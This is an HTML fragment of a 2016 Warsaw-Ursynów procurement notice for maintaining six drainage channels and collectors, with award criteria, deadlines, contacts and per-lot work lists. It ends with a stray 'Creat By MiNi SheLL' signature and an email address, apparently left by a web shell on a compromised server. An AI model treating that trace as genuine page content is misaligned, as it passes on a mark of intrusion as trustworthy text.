            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena brutto</td><td>60</td></tr><tr><td>termin wykonania konserwacji</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 30/09/2016, godzina: 10:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              PL<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />1. Osobami uprawnionymi do porozumiewania się z Wykonawcami są:
 - w zakresie dotyczącym przedmiotu zamówienia:
Adam Matejak  podinspektor w Wydziale Ochrony Środowiska,
tel. 22/ 443-73-62, faks: 22/443-72-91 
- w zakresie dotyczącym zagadnień formalno-prawnych:
Piotr Magiera  inspektor w Wydziale Zamówień Publicznych,
tel. 22/443-73-34, faks: 22/ 443-73-32, 
e-mail: zam_publ@ursynow.pl  
2.Otwarcie ofert nastąpi w dniu  30.09.2016 r. o godz. 11 : 00 w siedzibie Zamawiającego przy  Al. KEN 61 w sali konferencyjnej - pok. nr 458</div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Kanał Bokserski<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiot zamówienia.
Konserwacja urządzeń wodnych stanowiących własność Skarbu Państwa, będących odbiornikami wód opadowych i roztopowych pochodzących z obszarów miejskich na terenie Dzielnicy Ursynów m.st. Warszawy, 

Szczegółowa charakterystyka przedmiotu zamówienia
Pracami konserwacyjnymi objęte zostanie następujące urządzenie wodne - Kanał Bokserski.
Prace konserwacyjne obejmują:
1)	ręczne wykoszenie porostów gęstych twardych ze skarp ponad 2 m i pasa przybrzeżnego 1,0 m na długości cieku,
2)	wygrabianie wykoszonych porostów ze skarp o szer. ponad 2.0 m, 
3)	ręczne wykoszenie porostów rzadkich twardych z dna cieków,
4)	wygrabianie wykoszonych porostów  z dna cieków o szer. do 2,0 m,
5)	likwidacja przetamowań w dnie kanału,
6)	oczyszczenie kraty przy ul. Bokserskiej z wydobyciem namułów, 
7)	odmulenie dna kanału przy szer. 0,8 m przy zamuleniu do 20 cm w terenie zabudowanym,
8)	oczyszczenie studzienek o średnicy 1,0 m z namułów,
9)	oczyszczenie z namułu wlotów i wylotów rurociągu liczone jak oczyszczenie przepustów rurowych o śr. 1,0 m przy stosunku głębokości zamulenia do średnicy 1/3,
10)	zbieranie zanieczyszczeń komunalnych i ściętych porostów.

Zamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących czynności  polegające na koszeniu porostów miękkich ze skarp i dna urządzeń wodnych, wygrabianiu i zbieraniu traw, odmulaniu dna kanałów, kolektorów oraz przepustów.

 Szczegółowy opis przedmiotu zamówienia określają:
a)	Opis przedmiotu zamówienia, stanowiący załącznik nr 1a) do SIWZ, stanowiący jednocześnie załącznik nr 3 do umowy dla Części 1,
b)	Wzór umowy, stanowiący załącznik nr 7a do SIWZ, 
c)	Mapa sytuacyjna, stanowiąca załącznik nr 8a) do SIWZ, stanowiąca jednocześnie załącznik nr 1A, 1B do umowy dla Części 1.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90470000-2, 34930000-5,
                    77314100-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  17777.24<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 13/11/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena brutto</td><td>60</td></tr><tr><td>termin wykonania konserwacji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Termin wykonania zamówienia: od dnia 24.10.2016 r. do dnia 13.11.2016 r., z zastrzeżeniem § 2 ust. 2 wzoru umowy.<br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Kanał Imieliński<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiot zamówienia.
Konserwacja urządzeń wodnych stanowiących własność Skarbu Państwa, będących odbiornikami wód opadowych i roztopowych pochodzących z obszarów miejskich na terenie Dzielnicy Ursynów m.st. Warszawy, 

Szczegółowa charakterystyka przedmiotu zamówienia
Pracami konserwacyjnymi objęte zostanie następujące urządzenie wodne - Kanał Imieliński.
Prace konserwacyjne  obejmują:
1)	Ręczne wykoszenie porostów gęstych twardych ze skarp ponad 2 m i pasa przybrzeżnego 1,0 m na długości cieku,
2)	Wygrabianie wykoszonych porostów ze skarp o szer. ponad 2.0 m,
3)	Ręczne wykoszenie porostów rzadkich miękkich z dna cieków,
4)	Wygrabianie wykoszonych porostów  z dna cieków o szer. do 2,0 m,
5)	hakowanie przy zarośnięciu powierzchni lustra do 60%,
6)	odmulenie dna kanału przy szer. 0,8 m przy zamuleniu do 20 cm w terenie zabudowanym,
7)	oczyszczenie z namułu wlotów i wylotów rurociągu liczone jak oczyszczenie przepustów rurowych o śr. 1,5 m przy stosunku głębokości zamulenia do średnicy ,
8)	Zbieranie zanieczyszczeń komunalnych i ściętych porostów.

Zamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących czynności  polegające na koszeniu porostów miękkich ze skarp i dna urządzeń wodnych, wygrabianiu i zbieraniu traw, odmulaniu dna kanałów, kolektorów oraz przepustów.

Szczegółowy opis przedmiotu zamówienia określają:
a)	Opis przedmiotu zamówienia, stanowiący załącznik nr 1b) do SIWZ, stanowiący jednocześnie załącznik nr 3 do umowy dla Części 2,
b)	Wzór umowy, stanowiący załącznik nr 7b do SIWZ, 
c)	Mapa sytuacyjna, stanowiąca załącznik nr 8b) do SIWZ, stanowiąca jednocześnie załącznik nr 1A, 1B do umowy dla Części 2.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90470000-2, 34930000-5,
                    77314100-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  13338.99<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 13/11/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena brutto</td><td>60</td></tr><tr><td>termin wykonania konserwacji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Termin wykonania zamówienia: od dnia 24.10.2016 r. do dnia 13.11.2016 r., z zastrzeżeniem § 2 ust. 2 wzoru umowy.<br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Kolektor B2<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiot zamówienia.
Konserwacja urządzeń wodnych stanowiących własność Skarbu Państwa, będących odbiornikami wód opadowych i roztopowych pochodzących z obszarów miejskich na terenie Dzielnicy Ursynów m.st. Warszawy, 

Pracami konserwacyjnymi objęte zostanie następujące urządzenie wodne  Kolektor B-2. 
Prace konserwacyjne  obejmują:
1)	ręczne wykoszenie porostów gęstych twardych  ze skarp ponad 2 m i pasa przybrzeżnego 1,0 m na długości cieku,
2)	wygrabianie wykoszonych porostów ze skarp o szer. ponad 2.0 m,
3)	ręczne wykoszenie porostów rzadkich twardych z dna cieków,
4)	wygrabianie wykoszonych porostów  z dna cieków o szer. do 2,0 m,
5)	odmulenie dna kanału przy szer. 0,8 m przy zamuleniu do 20 cm w terenie zabudowanym,
6)	oczyszczenie studzienek o śr. 1.0 m z namułów,
7)	zbieranie zanieczyszczeń komunalnych i ściętych porostów.
Zamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących czynności  polegające na koszeniu porostów miękkich ze skarp i dna urządzeń wodnych, wygrabianiu i zbieraniu traw, odmulaniu dna kanałów, kolektorów oraz przepustów.

Szczegółowy opis przedmiotu zamówienia określają:
a)	Opis przedmiotu zamówienia, stanowiący załącznik nr 1c) do SIWZ, stanowiący jednocześnie załącznik nr 3 do umowy dla Części 3,
b)	Wzór umowy, stanowiący załącznik nr 7c do SIWZ, 
c)	Mapa sytuacyjna, stanowiąca załącznik nr 8c) do SIWZ, stanowiąca jednocześnie załącznik nr 1A, 1B do umowy dla Części 3.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90470000-2, 34930000-5,
                    77314100-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  5295.39<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 13/11/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena brutto</td><td>60</td></tr><tr><td>ermin wykonania konserwacji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Termin wykonania zamówienia: od dnia 24.10.2016 r. do dnia 13.11.2016 r., z zastrzeżeniem § 2 ust. 2 wzoru umowy.<br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Kanał Grabowski<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiot zamówienia.
Konserwacja urządzeń wodnych stanowiących własność Skarbu Państwa, będących odbiornikami wód opadowych i roztopowych pochodzących z obszarów miejskich na terenie Dzielnicy Ursynów m.st. Warszawy, 

Szczegółowa charakterystyka przedmiotu zamówienia
Pracami konserwacyjnymi objęte zostanie następujące urządzenie wodne - Kanał Grabowski.
Prace konserwacyjne obejmują:
1)	ręczne wykoszenie porostów gęstych twardych ze skarp ponad 2 m i pasa przybrzeżnego 1,0 m na długości cieku,
2)	wygrabianie wykoszonych porostów ze skarp o szer. ponad 2.0 m, 
3)	ręczne wykoszenie porostów rzadkich twardych z dna cieków,
4)	wygrabianie wykoszonych porostów  z dna cieków o szer. do 2,0 m,
5)	hakowanie przy zarośnięciu powierzchni lustra do 60%,
6)	odmulenie dna kanału przy szer. 0,8 m przy zamuleniu do 20 cm w terenie zabudowanym,
7)	odmulenie dna kanału przy szer. 0,6 m przy zamuleniu do 20 cm w terenie zabudowanym,
8)	odmulenie dna kanału przy szer. 1,0 m przy zamuleniu do 20 cm w terenie zabudowanym,
9)	oczyszczenie z namułu przepustów rurowych o śr. 1.0 m przy stosunku głębokości  zamulenia do średnicy 1/3,
10)	oczyszczenie z namułu przepustów rurowych o śr. 1.25 m przy stosunku głębokości zamulenia do średnicy 1/3 na wlocie i wylocie po 5m,
11)	oczyszczenie z namułu przepustów ramowych 2.0 x 2.0 m przy stosunku głębokości zamulenia do średnicy 1/3,
12)	oczyszczenie studzienek o średnicy 1,0 m z namułów,
13)	oczyszczenie z namułu wlotów i wylotów rurociągu liczone jak oczyszczenie przepustów rurowych o śr. 1,25 m przy stosunku głębokości zamulenia do średnicy 1/3,
14)	ręczne ścinanie i karczowanie rzadkich krzaków i podszycia, 
15)	oczyszczenie z namułu wylotów drenarskich dwustronnych pojedynczych,
16)	zbieranie zanieczyszczeń komunalnych i ściętych porostów - zebranie i złożenie zanieczyszczeń w pryzmy, wywóz wraz z utylizacją komunalnych.

Zamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących czynności  polegające na koszeniu porostów miękkich ze skarp i dna urządzeń wodnych, wygrabianiu i zbieraniu traw, odmulaniu dna kanałów, kolektorów oraz przepustów.

Szczegółowy opis przedmiotu zamówienia określają:
a)	Opis przedmiotu zamówienia, stanowiący załącznik nr 1d) do SIWZ, stanowiący jednocześnie załącznik nr 3 do umowy dla Części 4,
b)	Wzór umowy, stanowiący załącznik nr 7d do SIWZ, 
c)	Mapa sytuacyjna, stanowiąca załącznik nr 8d) do SIWZ, stanowiąca jednocześnie załącznik nr 1A, 1B do umowy dla Części 4.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90470000-2, 34930000-5,
                    77314100-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  75891.43<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 13/11/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena brutto</td><td>60</td></tr><tr><td>termin wykonania konserwacji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Termin wykonania zamówienia: od dnia 24.10.2016 r. do dnia 13.11.2016 r., z zastrzeżeniem § 2 ust. 2 wzoru umowy.<br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Kanał Jeziorki<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiot zamówienia.
Konserwacja urządzeń wodnych stanowiących własność Skarbu Państwa, będących odbiornikami wód opadowych i roztopowych pochodzących z obszarów miejskich na terenie Dzielnicy Ursynów m.st. Warszawy, 

Szczegółowa charakterystyka przedmiotu zamówienia
Pracami konserwacyjnymi objęte zostanie następujące urządzenie wodne - Kanał Jeziorki.
Prace konserwacyjne obejmują:
1)	ręczne wykoszenie porostów gęstych twardych ze skarp ponad 2 m i pasa przybrzeżnego 1,0 m na długości cieku,
2)	wygrabianie wykoszonych porostów ze skarp o szer. ponad 2.0 m, 
3)	ręczne wykoszenie porostów rzadkich twardych z dna cieków,
4)	wygrabianie wykoszonych porostów  z dna cieków o szer. do 2,0 m,
5)	ręczne ścinanie bez karczowania średniej gęstości krzaków,
6)	odmulenie dna kanału przy szer. 0,8 m przy zamuleniu do 30 cm w terenie zabudowanym,
7)	odmulenie dna kanału przy szer. 0,6 m przy zamuleniu do 30 cm w terenie zabudowanym,
8)	oczyszczenie z namułu przepustów rurowych o śr. 1.0 m przy stosunku głębokości  zamulenia do średnicy 1/3,
9)	oczyszczenie z namułu przepustów rurowych o śr. 1.25 m przy stosunku głębokości zamulenia do średnicy 1/3 na wlocie i wylocie po 5m,
10)	oczyszczenie z namułu przepustów rurowych o śr. 0,8 m przy stosunku głębokości zamulenia do średnicy 1/3,
11)	oczyszczenie z namułu przepustów rurowych o śr. 0,6 m przy stosunku głębokości zamulenia do średnicy 1/3,
12)	oczyszczenie z namułu przepustów ramowych 2.0 x 2.0 m przy stosunku głębokości zamulenia do średnicy 1/3,
13)	oczyszczenie studzienek o średnicy 1,0 m z namułów,
14)	oczyszczenie z namułu wlotów i wylotów rurociągu liczone jak oczyszczenie przepustów rurowych o śr. 0,8 m przy stosunku głębokości zamulenia do średnicy 1/3,
15)	oczyszczenie z namułów wylotów jednostronnych i dwustronnych,
16)	likwidacja przetamowań oraz oczyszczenie krat na wlotach do rurociągow,
17)	zbieranie zanieczyszczeń komunalnych i ściętych porostów.

Zamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących czynności  polegające na koszeniu porostów miękkich ze skarp i dna urządzeń wodnych, wygrabianiu i zbieraniu traw, odmulaniu dna kanałów, kolektorów oraz przepustów.

Szczegółowy opis przedmiotu zamówienia określają:
a)	Opis przedmiotu zamówienia, stanowiący załącznik nr 1e) do SIWZ, stanowiący jednocześnie załącznik nr 3 do umowy dla Części 5,
b)	Wzór umowy, stanowiący załącznik nr 7e do SIWZ, 
c)	Mapa sytuacyjna, stanowiąca załącznik nr 8e) do SIWZ, stanowiąca jednocześnie załącznik nr 1A, 1B do umowy dla Części 5.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90470000-2, 34930000-5,
                    77314100-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  73022.94<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 13/11/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena brutto</td><td>60</td></tr><tr><td>termin wykonania konserwacji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Termin wykonania zamówienia: od dnia 24.10.2016 r. do dnia 13.11.2016 r., z zastrzeżeniem § 2 ust. 2 wzoru umowy.<br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>Kolektor B-4<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiot zamówienia.
Konserwacja urządzeń wodnych stanowiących własność Skarbu Państwa, będących odbiornikami wód opadowych i roztopowych pochodzących z obszarów miejskich na terenie Dzielnicy Ursynów m.st. Warszawy, 

Pracami konserwacyjnymi objęte zostanie następujące urządzenie wodne  Kolektor B-4. 
Prace konserwacyjne  obejmują:
1)	ręczne wykoszenie porostów gęstych twardych  ze skarp ponad 2 m i pasa przybrzeżnego 1,0 m na długości cieku,
2)	wygrabianie wykoszonych porostów ze skarp o szer. ponad 2.0 m,
3)	ręczne wykoszenie porostów rzadkich twardych z dna cieków,
4)	wygrabianie wykoszonych porostów  z dna cieków o szer. do 2,0 m,
5)	hakowanie przy zarośnięciu powierzchni lustra do 60%,
6)	oczyszczenie studzienek o śr. 1.0 m z namułów,
7)	zbieranie zanieczyszczeń komunalnych i ściętych porostów.

Zamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących czynności  polegające na koszeniu porostów miękkich ze skarp i dna urządzeń wodnych, wygrabianiu i zbieraniu traw, odmulaniu dna kanałów, kolektorów oraz przepustów.

Szczegółowy opis przedmiotu zamówienia określają:
a)	Opis przedmiotu zamówienia, stanowiący załącznik nr 1f) do SIWZ, stanowiący jednocześnie załącznik nr 3 do umowy dla Części 6,
b)	Wzór umowy, stanowiący załącznik nr 7f do SIWZ, 
c)	Mapa sytuacyjna, stanowiąca załącznik nr 8f) do SIWZ, stanowiąca jednocześnie załącznik nr 1A, 1B do umowy dla Części 6.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90470000-2, 34930000-5,
                    77314100-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  34408.37<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 13/11/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena brutto</td><td>60</td></tr><tr><td>termin wykonania konserwacji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Termin wykonania zamówienia: od dnia 24.10.2016 r. do dnia 13.11.2016 r., z zastrzeżeniem § 2 ust. 2 wzoru umowy.<br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com